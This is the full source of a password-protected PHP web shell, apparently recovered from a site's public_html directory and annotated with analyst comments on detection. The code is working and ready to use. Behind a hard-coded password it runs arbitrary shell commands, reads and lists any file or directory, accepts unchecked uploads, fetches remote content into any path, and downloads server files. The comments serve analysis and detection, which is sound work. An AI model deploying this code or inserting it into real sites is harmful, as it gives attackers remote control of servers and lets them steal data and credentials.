| Current Path : /var/www/main-e-syn/public_html/ |
| Current File : /var/www/main-e-syn/public_html/p.php |
<?php
// Authentication gate for the rest of this file: nothing after the gate runs
// or is emitted unless the session carries authenticated === true.
// Analyst summary of the sections that follow the gate: command execution,
// file/directory viewing, file upload, fetch-from-URL, and file download.
//
// error_reporting(0) sets the reporting level to 0 for this request, so
// failures in the later sections do not surface as PHP warnings or notices.
error_reporting(0);
session_start();
// File name of this script; used only as the redirect target after logout.
$scriptName = basename(__FILE__);
// Login attempt: only evaluated for a POST that carries a `password` field.
// The password travels in the request body, so it is usually absent from
// access logs; the POST request to this file name is still recorded.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['password'])) {
// Hard-coded plaintext credential: the four-character string 'null', not the
// PHP null value. A literal like this can serve as a static scanning signature.
$expectedPassword = 'null';
// Strict (===) comparison; no attempt counter, delay or lockout is visible here.
if ($_POST['password'] === $expectedPassword) {
// The only state kept is this session flag; it persists until logout or
// until the session itself expires.
$_SESSION['authenticated'] = true;
} else {
echo '<div style="color:red;">Invalid password. Access denied.</div>';
}
}
// Gate: unauthenticated requests get the login form below and the script exits.
if (!isset($_SESSION['authenticated']) || $_SESSION['authenticated'] !== true) {
?>
<h2>Access Requested?</h2>
<form method="POST" action="">
<label for="password">Password:</label>
<input type="password" name="password" id="password" required>
<button type="submit">Submit</button>
</form>
<?php
exit();
}
// Logout: reachable only by an authenticated session, because the gate above
// exits first. Destroys the session and redirects back to this same file.
if (isset($_POST['logout']) && $_POST['logout'] === 'true') {
session_destroy();
header("Location: $scriptName");
exit();
}
?>
<!DOCTYPE html>
<html>
<head><title>Web Shell</title></head>
<body>
<b>Remote Code Execution</b><br />
<form method="GET" action="">
Command: <input type="text" name="command" size="50" value="<?php echo isset($_GET['command']) ? htmlspecialchars($_GET['command']) : ''; ?>" />
<button type="submit">Go</button>
</form>
<?php
// Command execution section: passes the `command` query parameter to the
// first available PHP process-execution function and prints the result,
// HTML-escaped, inside a <pre> block.
// Detection: the form uses GET, so each submitted command is part of the
// request URL and is normally recorded in the web server access log.
if (isset($_GET['command'])) {
// Taken verbatim from the request; no validation or allow-list is applied.
$cmd = $_GET['command'];
echo "<pre>Command: " . htmlspecialchars($cmd) . "\nOutput:\n";
$output = '';
// Fallback chain: shell_exec -> exec -> system -> passthru. function_exists()
// is the only availability check; presumably this is meant to cope with hosts
// that list some of these in disable_functions (TODO confirm intent).
// Hardening: all four must be unavailable for the final else branch to be hit.
if (function_exists('shell_exec')) {
$output = shell_exec($cmd);
} elseif (function_exists('exec')) {
// exec() fills $out with one array element per output line.
exec($cmd, $out);
$output = implode("\n", $out);
} elseif (function_exists('system')) {
// system() and passthru() print directly, so their output is captured with
// an output buffer and escaped later like the other branches.
ob_start();
system($cmd);
$output = ob_get_clean();
} elseif (function_exists('passthru')) {
ob_start();
passthru($cmd);
$output = ob_get_clean();
} else {
$output = 'No command execution function available.';
}
// A null result is shown as '(no output)'; anything else is HTML-escaped.
echo htmlspecialchars($output === null ? '(no output)' : $output) . "</pre>";
}
?>
<hr />
<b>Retrieve File / Scan Directory</b><br />
Current file path: <?php echo __FILE__; ?><br />
<form method="GET" action="">
Path: <input type="text" name="path" size="50" value="<?php echo isset($_GET['path']) ? htmlspecialchars($_GET['path']) : ''; ?>" />
<button type="submit">Go</button>
</form>
<pre>
<?php
// File / directory viewer: takes the `path` query parameter and either lists
// the directory entries or prints the file contents, HTML-escaped.
// No base directory is enforced in this code, so reach is bounded only by the
// filesystem permissions of the PHP process (and by open_basedir if the host
// sets it; that is not visible from here).
// Detection: `path` is a GET parameter, so requested paths appear in the URL.
if (isset($_GET['path'])) {
$rawPath = $_GET['path'];
// An empty value falls back to the current directory.
$path = ($rawPath === '') ? './' : $rawPath;
// realpath() is used for display only; the checks below operate on $path.
$real = realpath($path);
echo '<b>Realpath:</b> ' . ($real ? htmlspecialchars($real) : 'Failed to resolve') . '<br />';
echo '<b>Type:</b> ';
if (is_dir($path)) {
echo "Directory<br />";
// '@' suppresses the warning scandir() would raise on an unreadable directory.
$items = @scandir($path);
if ($items) {
foreach ($items as $item) {
echo htmlspecialchars($item) . "<br />";
}
} else {
echo "Unable to read directory.";
}
} elseif (is_file($path)) {
echo "File<br />";
// Whole file is read into memory and echoed; '@' hides read warnings.
$content = @file_get_contents($path);
echo $content !== false ? htmlspecialchars($content) : "Failed to read file.";
} else {
echo "Not a valid file or directory.";
}
}
?>
</pre>
<hr />
<b>Upload File From Your Local Machine</b><br />
<form method="POST" action="" enctype="multipart/form-data">
File(s): <input type="file" name="uploads[]" multiple required />
<button type="submit">Upload</button>
</form>
<?php
// Multi-file upload handler: stores every successfully received file in the
// current working directory under its client-supplied base name.
// No check on extension, content type or size is made here, and
// move_uploaded_file() overwrites an existing destination file.
// Detection: new or changed files appearing in the directory this script
// runs from (presumably the script's own directory; confirm for the SAPI).
if (isset($_FILES['uploads'])) {
foreach ($_FILES['uploads']['name'] as $i => $name) {
// Entries with any upload error are skipped without a message.
if ($_FILES['uploads']['error'][$i] === UPLOAD_ERR_OK) {
$tmp = $_FILES['uploads']['tmp_name'][$i];
// basename() drops directory components, so the write stays in './'.
$dest = './' . basename($name);
if (move_uploaded_file($tmp, $dest)) {
echo "Successfully uploaded " . htmlspecialchars($name) . "<br />";
} else {
echo "Unable to upload " . htmlspecialchars($name) . "<br />";
}
}
}
}
?>
<hr />
<b>Upload File From URL</b><br />
<form method="POST" action="">
Filename to save: <input type="text" name="save_name" size="30" required /><br />
URL: <input type="text" name="url" size="50" required />
<button type="submit">Upload</button>
</form>
<pre>
<?php
// Fetch-from-URL section: retrieves the content at a request-supplied URL and
// writes it to a request-supplied path on the server.
// Both values arrive in the POST body, so they are usually absent from access
// logs. Detection: an outbound request originating from the web server
// process; egress filtering on the web tier limits this path.
if (isset($_POST['save_name']) && isset($_POST['url'])) {
// Destination is used exactly as given (no basename()), so the write location
// is wherever the PHP process has write permission.
$saveAs = $_POST['save_name'];
$url = $_POST['url'];
$data = false;
// First attempt: stream wrapper fetch, only when allow_url_fopen is enabled.
// '@' suppresses the warning on failure.
if (ini_get('allow_url_fopen')) {
$data = @file_get_contents($url);
}
// Fallback: cURL, used when the first attempt produced nothing and the
// extension is loaded. Redirects are followed; total timeout is 30 seconds.
if ($data === false && function_exists('curl_init')) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$data = curl_exec($ch);
curl_close($ch);
}
// file_put_contents() returns the byte count, so a zero-length body is
// reported as a failure even though the file has been created.
if ($data !== false && file_put_contents($saveAs, $data)) {
echo "Successfully uploaded " . htmlspecialchars($saveAs);
} else {
echo "Unable to upload " . htmlspecialchars($saveAs) . " (check URL or PHP configuration)";
}
}
?>
</pre>
<hr />
<b>Download File From Web Server</b><br />
<form method="GET" action="">
Filename to download: <input type="text" name="download" size="100" required />
<button type="submit">Download</button>
</form>
<?php
// Download section: streams the file named by the `download` query parameter
// back to the client as an attachment. No path restriction is applied; the
// only checks are that the path exists and is a regular file.
// Detection: `download` is a GET parameter, so the requested path is in the URL.
if (isset($_GET['download'])) {
$file = $_GET['download'];
if (file_exists($file) && is_file($file)) {
// NOTE(review): HTML earlier in this file has already been output by this
// point, so these header() calls only take effect if output buffering is
// active; the ob_clean() below suggests a buffer is expected. Confirm
// against the host configuration. With error_reporting(0) a failure here
// produces no visible warning.
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
// Only the base name is exposed to the client; it is not escaped for quotes.
header('Content-Disposition: attachment; filename="' . basename($file) . '"');
header('Content-Length: ' . filesize($file));
header('Cache-Control: must-revalidate');
header('Pragma: public');
// Discard buffered page output so only the file bytes are sent.
ob_clean();
flush();
readfile($file);
exit;
} else {
echo "File does not exist or is not a regular file.";
}
}
?>
<hr />
<b>Logout</b><br />
<form method="POST" action="">
<input type="hidden" name="logout" value="true" />
<button type="submit">Logout</button>
</form>
</body>
</html>